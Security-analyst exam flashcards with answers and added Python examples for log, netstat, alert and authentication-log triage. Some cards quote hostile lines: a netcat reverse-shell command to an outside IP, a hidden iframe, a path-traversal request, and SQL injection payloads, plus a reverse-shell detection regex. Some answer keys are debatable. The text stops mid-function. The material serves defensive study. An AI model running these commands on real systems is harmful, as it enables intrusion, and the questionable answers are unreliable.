Bootcamp Flashcards

1
Q
  1. Which of the following command line utilities would an analyst use on an end-user PC to determine the ports it is listening on?

a. tracert
b. ping
c. nslookup
d. netstat

A

d. netstat

2
Q
  1. An employee has been terminated for providing company confidential information to an outside party. The employee should not have had access to this information as part of the employee’s normal job function. Human resources have asked the security analyst to take possession of the computer and provide a copy of this hard drive to law enforcement, who will conduct a forensic investigation to look for information to help determine if they can bring criminal charges against the former employee. Which of the following steps should be taken when making a copy of the hard drive to provide to law enforcement?

a. Make a copy of the hard drive using a write blocker to image the disk to forensically prepared media.
b. Degauss the hard drive and then copy to a hard drive of at least equivalent size using NTFS formatting.
c. Log onto the computer with administrator privileges and copy the hard drive to an external storage device.
d. Provide the hard drive to law enforcement to conduct the forensic exam directly on the original hard drive.

A

a. Make a copy of the hard drive using a write blocker to image the disk to forensically prepared media.

3
Q
  1. Which of the following is a vulnerability when using Windows as a host OS for virtual machines?

a. Windows requires frequent patching.
b. Windows virtualized environments are typically unstable.
c. Windows requires hundreds of open firewall ports to operate.
d. Windows is vulnerable to the “ping of death”.

A

a. Windows requires frequent patching.

4
Q
  1. A security analyst received an alert from the antivirus software identifying a complex instance of malware on a company’s network. The company does not have the resources to fully analyze the malware and determine its effect on the system. Which of the following is the BEST action to take in the incident recovery and post-incident response process?

a. Wipe hard drives, reimage the system, and return the affected systems to a ready state.
b. Detect and analyze the precursors and indicators; schedule a lessons learned meeting.
c. Remove the malware and inappropriate materials; eradicate the incident.
d. Perform event correlation; create a log retention policy.

A

a. Wipe hard drives, reimage the system, and return the affected systems to a ready state.

5
Q
  1. The security team has determined that the current incident response resources cannot meet management’s objective to secure a forensic image for all serious security incidents within 24 hours. Which of the following compensating controls can be used to help meet management’s expectations?

a. Separation of duties
b. Scheduled reviews
c. Dual control
d. Outsourcing

A

d. Outsourcing

11
Q
  1. An organization has had problems with security teams remediating vulnerabilities that are either false positives or are not applicable to the organization’s servers. Management has put emphasis on security teams conducting detailed analysis and investigation before conducting any remediation. The output from a recent Apache web server scan is shown below:
    Scan Host: 192.168.1.18
    15-Jan-16 10:12:10.1 PDT
    Vulnerability CVE-2006-5752
    Cross-site scripting (XSS) vulnerability in the mod_status module of Apache server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML.
    Severity: 4.3 (medium)

    The team performs some investigation and finds the statement from Apache on 07/02/2008: “Fixed in Apache HTTP server 2.2.6, 2.0.61, and 1.3.39”.
    Which of the following conditions would require the team to perform remediation on this finding?

a. The organization is running version 2.2.6 and has ExtendedStatus enabled.
b. The organization is running version 2.0.59 and is not using a public server-status page.
c. The organization is running version 1.3.39 and is using a public server-status page.
d. The organization is running version 2.0.5 and has ExtendedStatus enabled.

A

d. The organization is running version 2.0.5 and has ExtendedStatus enabled.
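The analysis the card asks for, written out as an added example (not part of the original flashcard set and not Apache’s code): compare the running release against the fixed release of its own branch, then check the two preconditions named in the CVE text. A precondition the investigation has not established is treated as present, so an unverified finding is never silently dropped. The FIXED_IN table and the per-option tuples are transcribed from the card; nothing else is assumed.

```python
"""Version-and-precondition check for the CVE-2006-5752 finding.

Added example for this card, not code from the flashcard set or from Apache.
It encodes only what the card states: the fix shipped in httpd 2.2.6, 2.0.61
and 1.3.39 (one fixed release per branch), and the flaw is reachable only when
ExtendedStatus is enabled and a public server-status page is exposed.
"""

# Fixed release per branch, from the Apache statement quoted on the card.
FIXED_IN = {
    (2, 2): (2, 2, 6),
    (2, 0): (2, 0, 61),
    (1, 3): (1, 3, 39),
}


def parse_version(text):
    """'2.0.59' -> (2, 0, 59); also accepts scanner banners like 'Apache/2.0.59'."""
    return tuple(int(part) for part in text.strip().split("/")[-1].split("."))


def version_is_vulnerable(version):
    """True when the running release predates its branch's fixed release.

    A branch the advisory does not mention cannot be cleared from the advisory
    alone, so it is reported as vulnerable and left for manual follow-up.
    """
    v = parse_version(version)
    fixed = FIXED_IN.get(v[:2])
    if fixed is None:
        return True
    return v < fixed


def needs_remediation(version, extended_status=None, public_status_page=None):
    """Remediate only if the code is unpatched AND no precondition is known false.

    None means "not established by the investigation" and is treated as True
    (fail closed).
    """
    if extended_status is False or public_status_page is False:
        return False
    return version_is_vulnerable(version)


# The four answer options as (version, ExtendedStatus, public status page);
# None marks a detail the option does not state.
OPTIONS = {
    "a": ("2.2.6", True, None),
    "b": ("2.0.59", None, False),
    "c": ("1.3.39", None, True),
    "d": ("2.0.5", True, None),
}


def options_requiring_remediation():
    """Letters of the options that genuinely need a fix."""
    return sorted(letter for letter, args in OPTIONS.items()
                  if needs_remediation(*args))


if __name__ == "__main__":
    for letter, (ver, es, page) in OPTIONS.items():
        verdict = "remediate" if needs_remediation(ver, es, page) else "no action"
        print(letter, ver, "->", verdict)
```

Options a and c run a fixed release, option b has the status page disabled, and only option d combines an unpatched release with the enabled ExtendedStatus, so it is the one that requires work.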

12
Q
  1. Which of the following tools should an analyst use to scan for web server vulnerabilities?

a. Wireshark
b. Qualys
c. ArcSight
d. SolarWinds

A

b. Qualys

13
Q
  1. An analyst is preparing for a technical security compliance check on all Apache servers. Which of the following will be the BEST to use?

a. CIS benchmark
b. Nagios
c. Untidy
d. Cain & Abel

A

a. CIS benchmark

14
Q
  1. A technician is troubleshooting a desktop computer with low disk space. The technician reviews the following information snippets:
    Disk Allocation Report
    350GB - C:\user1\movies\movies
    Network Stats
    Proto  Local Address       Foreign Address     State      Process
    TCP    0.0.0.0:8080        0.0.0.0             LISTENING  movieDB
    TCP    192.168.1.10:8080   172.16.34.77:1200   TIME_WAIT
    Which of the following should the technician do to BEST resolve the issue based on the above information? (Select TWO)

a. Delete the movies\movies directory.
b. Disable the movieDB service.
c. Enable OS auto updates.
d. Install a file integrity tool.
e. Defragment the disk.

A

a. Delete the movies\movies directory.

b. Disable the movieDB service.

15
Q
  1. A cybersecurity analyst was asked to review web vulnerability scan logs. Given the following snippet of code:
    <iframe src="http://65.240.22.1" width="0" height="0" frameborder="0"
    tabindex="-1" title="empty" style="visibility:hidden;display:none">
    </iframe>
    Which of the following BEST describes the situation and recommendations to be made?

a. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The code should include the domain name. Recommend the entry be updated with the domain name.
b. The security analyst has discovered an embedded iframe that is hidden from users accessing the web page. This code is correct. This is a design preference, and no vulnerabilities are present.
c. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious. Recommend the entry be removed from the web page.
d. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. Recommend making the iframe visible. Fixing the code will correct the issue.

A

c. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious. Recommend the entry be removed from the web page.

16
Q
  1. A cybersecurity analyst is currently auditing a new Active Directory server for compliance. The analyst uses Nessus to do the initial scan, and Nessus reports the following:
    PluginID  IP             Port
    10955     192.168.1.215  Microsoft-ds (445/tcp)
    11210     192.168.1.215  Microsoft-ds (445/tcp)
    12350     192.168.1.215  Netbus (35/udp)
    12345     192.168.1.215  Ftp (21/tcp)
    Which of the following critical vulnerabilities has the analyst discovered?

a. Known backdoor
b. Zero-day
c. Path disclosure
d. User enumeration

A

a. Known backdoor

17
Q
  1. Malicious users utilized brute force to access a system. An analyst is investigating these attacks and recommends methods to management that would help secure the system. Which of the following controls should the analyst recommend? (Select THREE).

a. Multifactor authentication
b. Network segmentation
c. Single sign-on
d. Encryption
e. Complexity policy
f. Biometrics
g. Obfuscation

A

a. Multifactor authentication
b. Network segmentation
e. Complexity policy

18
Q
  1. A small company is publishing a new web application to receive customer feedback related to its products. The web server will only host a form to receive customer feedback and store it in a local database. The web server is placed in a DMZ network, and the web service and file system have been hardened. However, the cybersecurity analyst discovers that data from the database can be mined over the internet. Which of the following should the cybersecurity analyst recommend be done to provide temporary mitigation from unauthorized access to the database?

a. Configure the database to listen for incoming connections on the internet network.
b. Change the database connection string and apply the necessary patches.
c. Configure an ACL in the border firewall to block all connections to the web server for ports other than 80 and 443.
d. Deploy a web application firewall to protect the web application from attacks to the database.

A

c. Configure an ACL in the border firewall to block all connections to the web server for ports other than 80 and 443.

19
Q
  1. A security administrator uses FTK to take an image of a hard drive that is under investigation. Which of the following processes are used to ensure the image is the same as the original disk? (Select TWO).

a. Validate the folder and file directory listings on both.
b. Check the hash value between the image and the original.
c. Boot up the image and the original system to compare.
d. Connect a write blocker to the imaging device.
e. Copy the data to a disk of the same size and manufacturer.

A

b. Check the hash value between the image and the original.

d. Connect a write blocker to the imaging device.

20
Q
  1. A company’s IDP/DLP solution triggered the following alerts:

a. 02/25-07:16:07.294705 SSH to Non-standard Port (TCP) 245.23.123.150:51533 -> 67.178.142.153:1234
b. 02/25-08:16:24.637829 E-mail sent containing text pattern 9999 9999 9999 9999 (TCP) 192.168.123.150:36543 -> 209.34.13.163:25
c. 02/25-08:23:53.367782 Malformed DNS Packet, size exceeded (UDP) 192.168.84.150:45513 -> 172.16.32.12:53
d. 02/25-09:01:34.335672 XMAS packet detected (TCP) 192.168.233.18:61412 -> 172.16.15.233:445
e. 02/25-09:12:51.564607 Attempted FTP Connection, clear text auth (TCP) 192.168.12.45:47654 -> 172.16.222.12:21

A

b. 02/25-08:16:24.637829 E-mail sent containing text pattern 9999 9999 9999 9999 (TCP) 192.168.123.150:36543 -> 209.34.13.163:25
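Why alert b is the one to chase, as an added example (not from the original card): parse each alert line as printed, work out its direction, and for the DLP hit test whether the 16-digit string could be a real card number. The outbound direction (internal source to public destination over SMTP) is what makes b the exfiltration candidate; the Luhn check is the extra step a practitioner adds, because “9999 9999 9999 9999” has the shape of a PAN but fails Luhn, which is what a test or placeholder value looks like. The RFC 1918 ranges are assumed to be the company’s internal address plan.

```python
"""Triage of the card's five IDS/DLP alerts: which one shows data leaving.

Added example, not from the original card. Alert text is transcribed from
the card; the internal address ranges are an assumption.
"""
import ipaddress
import re

# Alert lines transcribed from the card (constructed sample, not live data).
ALERTS = {
    "a": "02/25-07:16:07.294705 SSH to Non-standard Port (TCP) 245.23.123.150:51533 -> 67.178.142.153:1234",
    "b": "02/25-08:16:24.637829 E-mail sent containing text pattern 9999 9999 9999 9999 (TCP) 192.168.123.150:36543 -> 209.34.13.163:25",
    "c": "02/25-08:23:53.367782 Malformed DNS Packet, size exceeded (UDP) 192.168.84.150:45513 -> 172.16.32.12:53",
    "d": "02/25-09:01:34.335672 XMAS packet detected (TCP) 192.168.233.18:61412 -> 172.16.15.233:445",
    "e": "02/25-09:12:51.564607 Attempted FTP Connection, clear text auth (TCP) 192.168.12.45:47654 -> 172.16.222.12:21",
}

ALERT_RE = re.compile(
    r"^(?P<ts>\S+) (?P<msg>.+?) \((?P<proto>TCP|UDP)\) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)
# Four groups of four digits, optionally separated by space or dash.
PAN_SHAPE = re.compile(r"\b(?:\d{4}[ -]?){3}\d{4}\b")

# Assumed internal address plan (RFC 1918).
INTERNAL = [ipaddress.ip_network(n)
            for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL)


def luhn_ok(digits):
    """Standard Luhn check over a string of decimal digits."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                  # every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def parse_alert(line):
    m = ALERT_RE.match(line)
    if not m:
        raise ValueError("unrecognised alert format: " + line)
    rec = m.groupdict()
    rec["sport"], rec["dport"] = int(rec["sport"]), int(rec["dport"])
    return rec


def triage(line):
    """Direction, plus the Luhn result where the message carries a PAN-shaped string."""
    rec = parse_alert(line)
    rec["egress"] = is_internal(rec["src"]) and not is_internal(rec["dst"])
    pan = PAN_SHAPE.search(rec["msg"])
    rec["pan_shape"] = pan is not None
    rec["luhn_valid"] = luhn_ok(re.sub(r"\D", "", pan.group())) if pan else None
    return rec


def exfiltration_candidates(alerts=ALERTS):
    """Letters of alerts that are both outbound and carry sensitive-looking data."""
    out = []
    for letter, line in alerts.items():
        t = triage(line)
        if t["egress"] and t["pan_shape"]:
            out.append(letter)
    return sorted(out)
```

Alerts c, d and e stay inside internal space, and a originates outside it, so b is the only outbound event. Its payload failing Luhn does not clear it: the e-mail still left the network with something shaped like card data, and the question of whether it was a real PAN is answered from the message itself, not from the alert.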

22
Q
  1. A threat intelligence analyst who is working on the SOC floor has been forwarded an email that was sent to one of the executives in business development. The executive mentions the email was from the Chief Executive Officer (CEO), who was requesting an emergency wire transfer. This request was unprecedented. Which of the following threats MOST accurately aligns with this behavior?

a. Phishing
b. Whaling
c. Spam
d. Ransomware

A

b. Whaling

23
Q
  1. A security analyst is conducting traffic analysis and observes an HTTP POST to the company’s main web server. The POST header is approximately 1000 bytes in length. During transmission, one byte is delivered every ten seconds. Which of the following attacks is the traffic indicative of?

a. Exfiltration
b. DoS
c. Buffer overflow
d. SQL injection

A

b. DoS

A 1000-byte POST header trickled in at one byte every ten seconds is a slow HTTP (Slowloris/RUDY-style) attack: each such request holds a server worker open for hours, and enough of them exhaust the connection pool. Nothing is being pulled off the company’s own server, so exfiltration does not fit the traffic described.

24
Q
  1. A security analyst wants to confirm a finding from a penetration test report on the internal web server. To do so, the analyst logs into the web server using SSH to send the request locally. The report provides a link to https://hrserver.internal/../etc/paswd, and the server IP address is 10.10.10.15. However, after several attempts, the analyst cannot get the file, despite trying to get it in different ways, as shown below:
    Request                                     Response
    https://hrserver.internal/../…/etc/paswd    Host not found
    https://localhost/../…/etc/passwd           File not found
    https://10.10.10.15/../…/etc/passwd         File not found
    Which of the following would explain this problem? (Select TWO)

a. The web server uses SNI to check for a domain name.
b. Request can only be sent remotely to the webserver
c. There is no local name resolution for hrserver.internal
d. The password file is write protected
e. The web server has not started

A

a. The web server uses SNI to check for a domain name.

c. There is no local name resolution for hrserver.internal

25
Q
  1. A SIEM alert occurs with the following output:
    MAC                IP             Duration  Logged on
    01:23:45:33:89:cc  192.168.122.3  15 hours  Yes
    01:23:45:33:89:cc  192.168.122.9  4 days    Yes
    Which of the following BEST describes this alert?

a. The alert is a false positive; there is a device with dual NICs.
b. The alert is valid because IP spoofing may be occurring on the network.
c. The alert is a false positive, both NICs are of the same brand.
d. The alert is valid because there may be a rogue device on the network

A

d. The alert is valid because there may be a rogue device on the network
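The rule behind this alert, as an added example (not from the original card): group active sessions by MAC and flag any MAC logged on from more than one IP at once. Two physical NICs in one host each carry their own MAC, so a genuine dual-NIC machine does not trip the rule; the same MAC behind two addresses means a second device is using that address. A second hint the code tests is the I/G bit: a first octet with its low bit set (01:…) is a group/multicast address that no NIC uses as its own source address. The benign DUAL_NIC_ROWS sample is constructed for contrast.

```python
"""Checks behind the card's SIEM alert: one MAC, two concurrently logged-on IPs.

Added example, not from the original card. ALERT_ROWS is transcribed from
the card; DUAL_NIC_ROWS is a constructed benign case.
"""
import re
from collections import defaultdict

ALERT_ROWS = """\
01:23:45:33:89:cc 192.168.122.3 15 hours Yes
01:23:45:33:89:cc 192.168.122.9 4 days Yes
"""

# One host with two NICs from the same vendor OUI: two MACs, two IPs.
DUAL_NIC_ROWS = """\
00:1b:21:aa:00:01 192.168.122.40 2 days Yes
00:1b:21:aa:00:02 192.168.122.41 2 days Yes
"""

ROW_RE = re.compile(
    r"^(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\s+(?P<ip>[\d.]+)\s+"
    r"(?P<duration>\d+\s+\w+)\s+(?P<logged_on>Yes|No)$", re.IGNORECASE)


def parse_rows(text):
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["mac"] = rec["mac"].lower()
            rec["logged_on"] = rec["logged_on"].lower() == "yes"
            rows.append(rec)
    return rows


def is_group_address(mac):
    """True when the I/G bit (least significant bit of the first octet) is set."""
    return int(mac.split(":")[0], 16) & 1 == 1


def macs_with_multiple_ips(rows):
    """{mac: sorted IPs} for MACs currently logged on from more than one IP."""
    seen = defaultdict(set)
    for r in rows:
        if r["logged_on"]:
            seen[r["mac"]].add(r["ip"])
    return {mac: sorted(ips) for mac, ips in seen.items() if len(ips) > 1}


def assess(text):
    """'rogue-or-spoofed' when one MAC sits on several IPs, else 'ok'."""
    return "rogue-or-spoofed" if macs_with_multiple_ips(parse_rows(text)) else "ok"
```

The alert is valid: the MAC appears on two addresses at the same time, and on top of that it is not even a valid unicast hardware address, which points at a fabricated value rather than a real second NIC.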

26
Q
  1. A company provides wireless connectivity to the internal network from all physical locations for company-owned devices. Users were able to connect the day before, but now all users have reported that when they connect to an access point in the conference room, they cannot access company resources. Which of the following BEST describes the cause of the problem?

a. The access point is blocking access by MAC address. Disable MAC address filtering.
b. The network is not available. Escalate the issue to network support.
c. Expired DNS entries exist on users’ devices. Request the affected users perform a DNS flush.
d. The access point is a rogue device. Follow incident response procedures.

A

d. The access point is a rogue device. Follow incident response procedures.

27
Q
  1. An application contains the following log entries in a file named "authlog.log":
    User 'oidc-provider-fb:john' successfully logged in 2016-01-01 23:00:01
    User 'local:Administrator' successfully logged out 2016-01-01 23:00:05
    User 'oidc-provider-fb:kate' successfully logged out 2016-01-01 23:00:07
    A security analyst has been asked to parse the log file and print out all valid usernames. Which of the following achieves this task?

a. grep -e "successfully" authlog.log | awk '{print $2}' | sed s/\'//g
b. cat authlog.log | grep "2016-01-01" | echo "valid username found: $2"
c. echo authlog.log > sed 's/User//' | print "username exists: $user"
d. cat "authlog.log" | grep "User" | cut -F' ' | "username exists: $1"

A

a. grep -e "successfully" authlog.log | awk '{print $2}' | sed s/\'//g
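What the answer’s pipeline actually prints, and a stricter parser beside it, as an added example (not from the original card). Option a prints the second whitespace-separated field with the quotes stripped, i.e. the whole realm:user token, and because it greps for “successfully” it prints logout lines as well as logins. The parser below splits realm from user with one regex, validates the timestamp, skips lines that do not fit, and returns distinct usernames. Straight quotes around the user token and a fourth, malformed line are assumptions of the constructed sample.

```python
"""Parsing authlog.log into (realm, user, event, timestamp) records.

Added example, not from the original card. The first three AUTHLOG lines
are transcribed from the card; the fourth is constructed to show that a
malformed line is ignored rather than misreported.
"""
import re
from datetime import datetime

AUTHLOG = """\
User 'oidc-provider-fb:john' successfully logged in 2016-01-01 23:00:01
User 'local:Administrator' successfully logged out 2016-01-01 23:00:05
User 'oidc-provider-fb:kate' successfully logged out 2016-01-01 23:00:07
Unexpected line that is not an auth event
"""

LINE_RE = re.compile(
    r"^User '(?P<realm>[^':]+):(?P<user>[^']+)' successfully logged "
    r"(?P<event>in|out) (?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})$")


def parse_authlog(text):
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S")
        records.append(rec)
    return records


def valid_usernames(text):
    """Distinct usernames from well-formed auth events, logins and logouts alike."""
    return sorted({r["user"] for r in parse_authlog(text)})


def users_logged_in(text):
    """Only the users whose event was a login."""
    return sorted({r["user"] for r in parse_authlog(text) if r["event"] == "in"})


def option_a_output(text):
    """What the card's answer prints: field 2 with the quotes removed."""
    out = []
    for line in text.splitlines():
        if "successfully" in line:
            fields = line.split()
            if len(fields) > 1:
                out.append(fields[1].replace("'", ""))
    return out
```

Option a is the only choice that is valid shell at all (b, c and d pipe into echo, print and a bare string, none of which read stdin as intended), which is why it is the answer even though it prints the realm prefix as part of the name.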

28
Q
  1. An organization has two environments: development and production. Development is where applications are developed with unit testing. The development environment has many configuration differences from the production environment. All applications are hosted on virtual machines. Vulnerability scans are performed against all systems before and after any application or configuration changes to any environment. Lately, vulnerability remediation activity has caused production applications to crash and behave unpredictably. Which of the following changes should be made to the current vulnerability management process?

a. Create a third environment between development and production that mirrors production and tests all changes before deployment to the user.
b. Refine testing in the development environment to include fuzzing and user acceptance testing so applications are more stable before they migrate to production.
c. Create a second production environment by cloning the virtual machines, and if any stability problems occur, migrate users to the alternate production environment.
d. Refine testing in the production environment to include more exhaustive application stability testing while continuing to maintain the robust vulnerability remediation activities.

A

a. Create a third environment between development and production that mirrors production and tests all changes before deployment to the user.

29
Q
  1. When reviewing the system log, the cybersecurity analyst noticed a suspicious log entry.
    wmic /node:HRDepartment1 computersystem get username
    Which of the following combinations describes what occurred, and what action should be taken in this situation?

a. A rogue user has queried for users logged in remotely. Disable local access to network shares.
b. A rogue user has queried for the administrator logged into the system. Attempt to determine who executed the command.
c. A rogue user has queried for the administrator logged into the system. Disable local access to use cmd prompt.
d. A rogue user has queried for the user logged in remotely. Attempt to determine who executed the command.

A

d. A rogue user has queried for the user logged in remotely. Attempt to determine who executed the command.

30
Q
  1. A security analyst is investigating the possible compromise of a production server for the company’s public-facing portal. The analyst runs a vulnerability scan against the server and receives the following output:
    + Server: nginx/1.4.6 (Ubuntu)
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    + No CGI Directories found (use '-c all' to force check all the possible dirs)
    + Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
    + "robots.txt" contains two entries that should be manually viewed.
    In some of the portal’s startup command files, the following command appears:
    nc -e /bin/sh 72.14.1.36 4444
    Investigating further, the analyst runs netstat and obtains the following output:
    # netstat -an
    Active Internet connections (servers and established)
    Proto  Recv-Q  Send-Q  Local Address  Foreign Address  State
    tcp    0       0       *:443          *:*              LISTEN
    tcp    0       52      *:59482        72.14.1.36:4444  ESTABLISHED
    tcp    0       0       *:80           *:*              LISTEN
    Which of the following is the best step for the analyst to take NEXT?

a. Initiate the security incident response process.
b. Recommend training to avoid mistakes in production command files.
c. Delete the unknown files from the production servers.
d. Patch a new vulnerability that has been discovered.
e. Manually review the robots.txt file for errors.

A

a. Initiate the security incident response process.
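The correlation that turns two observations into an incident, as an added example (not from the original card): parse the netstat output, keep ESTABLISHED sessions to peers outside the company’s address space, scan startup files for a netcat-style reverse shell command, and report callbacks that are both configured and connected right now. The netstat text is transcribed from the card; the /etc/rc.local contents and the RFC 1918 internal ranges are assumptions. A hit here is the trigger for the incident response process, not a cue to delete files or patch first: the host is under someone else’s control and the evidence must survive.

```python
"""Correlating a startup-file reverse shell with the live netstat output.

Added example, not from the original card. NETSTAT is transcribed from the
card; STARTUP_FILES and the INTERNAL ranges are constructed assumptions.
"""
import ipaddress
import re

NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:443 *:* LISTEN
tcp 0 52 *:59482 72.14.1.36:4444 ESTABLISHED
tcp 0 0 *:80 *:* LISTEN
"""

# Constructed startup file carrying the command quoted on the card.
STARTUP_FILES = {
    "/etc/rc.local": "#!/bin/sh\nnc -e /bin/sh 72.14.1.36 4444 &\nexit 0\n",
}

INTERNAL = [ipaddress.ip_network(n)
            for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# nc/ncat/netcat with -e (run a program on connect), then host and port.
REVERSE_SHELL_RE = re.compile(
    r"\b(?:nc|ncat|netcat)\b[^\n]*?\s-e\s+\S+\s+(?P<host>[\d.]+)\s+(?P<port>\d+)")


def parse_netstat(text):
    """Rows of `netstat -an`; header and banner lines are skipped."""
    conns = []
    for line in text.splitlines():
        f = line.split()
        if len(f) == 6 and f[0] in ("tcp", "tcp6", "udp", "udp6"):
            conns.append({"proto": f[0], "local": f[3], "foreign": f[4], "state": f[5]})
    return conns


def external_established(conns):
    """(host, port) of ESTABLISHED sessions whose peer is outside INTERNAL."""
    out = []
    for c in conns:
        if c["state"] != "ESTABLISHED":
            continue
        host, _, port = c["foreign"].rpartition(":")
        if host != "*" and not any(ipaddress.ip_address(host) in n for n in INTERNAL):
            out.append((host, int(port)))
    return out


def reverse_shell_commands(files):
    """(path, host, port) for every netcat -e callback found in the files."""
    hits = []
    for path, content in files.items():
        for m in REVERSE_SHELL_RE.finditer(content):
            hits.append((path, m.group("host"), int(m.group("port"))))
    return hits


def active_callbacks(netstat_text, files):
    """Configured reverse shells that are connected at this moment."""
    live = set(external_established(parse_netstat(netstat_text)))
    return sorted((path, host, port)
                  for path, host, port in reverse_shell_commands(files)
                  if (host, port) in live)
```

The missing security headers and the robots.txt entries are real findings, but they are hygiene items; an outbound shell to 72.14.1.36:4444 that is established while you look at it is the thing that decides what happens next.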

31
Q
  1. A cybersecurity analyst wants to use a tool that prevents vulnerabilities in software from being successfully exploited. Which of the following tools can be implemented to achieve this goal?

a. HIPS
b. EMET
c. Helix
d. Nessus

A

a. HIPS

EMET (Microsoft’s Enhanced Mitigation Experience Toolkit) was built for exactly this purpose as well: it forces DEP, ASLR, SEHOP and similar mitigations onto processes so that an exploit for an unpatched bug fails, so treat b as the other defensible answer. Helix is a forensic live CD and Nessus only finds the vulnerability; neither prevents exploitation.

32
Q
  1. Which of the following utilities could be used to resolve an IP address to a domain name, assuming the address has a PTR record?

a. ifconfig
b. ping
c. arp
d. nbtstat

A

b. ping

33
Q
  1. Which of the following describes why it is important for an organization’s incident response team and legal department to meet and discuss communication processes during the incident response process?

a. To comply with existing organizational policies and procedures on interacting with internal and external parties.
b. To ensure all parties know their roles and effective lines of communication are established
c. To identify which group will communicate details to law enforcement in the event of a security incident
d. To predetermine what details should or should not be shared with internal or external parties in the event of an incident

A

b. To ensure all parties know their roles and effective lines of communication are established

34
Q
  1. During a physical penetration test at a client site, a local law enforcement officer stumbled upon the test and questioned the legitimacy of the team. Which of the following information should be shown to the officer?

a. Letter of engagement
b. Scope of work
c. Timing information
d. Team reporting

A

b. Scope of work

35
Q
  1. A security administrator recently deployed a virtual honeynet. The honeynet is not protected by the company’s firewall, while all production networks are protected by a stateful firewall. Which of the following would BEST allow an external penetration tester to determine which one is the honeynet’s network?

a. Banner grab
b. Packet analyzer
c. Fuzzer
d. TCP ACK scan

A

d. TCP ACK scan

36
Q
  1. A security analyst is reviewing a report from the networking department that describes an increase in network utilization, which is causing network performance issues on some systems. A top talkers report over a five-minute sample is included.
    Source         Destination    Application  Packets  Volume (kbps)
    8.4.4.100      172.16.1.25    SMTP         4386     6141
    96.23.114.14   172.16.1.1     IPSec        7734     10827
    172.16.1.101   100.15.25.34   HTTP         3412     4776
    96.23.114.18   172.16.1.1     IPSec        2723     3812
    172.16.1.101   100.15.25.34   SSL          8697     12176
    172.16.1.222   203.67.121.12  Quicktime    1302     1822
    172.16.1.197   113.121.12.15  8180/tcp     6045     8463
    172.16.1.131   172.16.1.67    DHCP         25       35
    172.16.1.25    172.16.1.53    DNS          66       93
    Given the above output of the sample, which of the following should the security analyst accomplish FIRST to help track down the performance issues?

a. Perform a reverse lookup on each of the IP addresses listed to help determine if the traffic is necessary.
b. Recommend that networking block the unneeded protocols such as QuickTime to clear up some of the congestion.
c. Put ACLs in place to restrict traffic destined for random or non-default application ports.
d. Quarantine the top talker on the network and begin to investigate any potential threats caused by the excessive traffic.

A

c. Put ACLs in place to restrict traffic destined for random or non-default application ports.

37
Q
  1. During a quarterly review of user accounts and activity, a security analyst noticed that after a password reset the head of human resources has been logging in from multiple external locations, including several overseas. Further review of the account showed access rights to several corporate applications, including a sensitive accounting application used for employee bonuses. Which of the following security methods could be used to mitigate this risk?

a. RADIUS identity management
b. Context-based authentication
c. Privilege escalation restrictions
d. Elimination of self-service password resets

A

b. Context-based authentication

38
Q
  1. On which of the following organizational resources is the lack of an enabled password or PIN a common vulnerability?

a. VDI systems
b. Mobile devices
c. Enterprise server OSs
d. VPNs
e. VoIP phones

A

b. Mobile devices

39
Q
  1. A security analyst has performed various scans and found vulnerabilities in several applications that affect production data. Remediation of all exploits may cause certain applications to no longer work. Which of the following activities would need to be conducted BEFORE remediation?

a. Fuzzing
b. Input validation
c. Change control
d. Sandboxing

A

c. Change control

40
Q
  1. The SOC shift supervisor is looking through the administrator access logs for the key network devices. The supervisor notices there are no administrative access entries for the previous day but knows IOS upgrades were scheduled on key network devices, according to the change control board notifications from the last shift logs. Which of the following is the MOST likely cause?

a. Someone cleared the log files to cover malicious activity.
b. Updates and upgrades were pushed out to a later date.
c. SNMP community string was changed in the upgrade process.
d. There were issues aggregating the individual log files into the administrator access logs.

A

a. Someone cleared the log files to cover malicious activity.

41
Q
  1. A cybersecurity analyst is currently using Nessus to scan several FTP servers. Upon receiving the results of the scan, the analyst needs to test further to verify that the vulnerability found exists. The analyst uses the following snippet of code:
    Username: admin' ; --
    Password: ' OR 1=1 --
    Which of the following vulnerabilities is the analyst checking for?

a. Buffer overflow
b. SQL injection
c. Default password
d. Format string attack

A

b. SQL injection
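The card’s password payload run against a string-built login query and a parameterised one, as an added example (not from the original card). An in-memory SQLite table stands in for the FTP server’s user store; plaintext passwords and the two sample accounts are constructed only to keep the demo short. With string concatenation, ' OR 1=1 -- turns the WHERE clause into (user AND pass) OR true and the query returns the first account; with bound parameters the same text is just a password that does not match. The username payload admin' ; -- is a statement-stacking probe; Python’s sqlite3 runs one statement per execute() call, so it is not exercised here.

```python
"""The card's SQL injection probe against vulnerable and safe login code.

Added example, not from the original card. The table contents are
constructed sample data.
"""
import sqlite3


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """String-built query: user input is spliced into the SQL text."""
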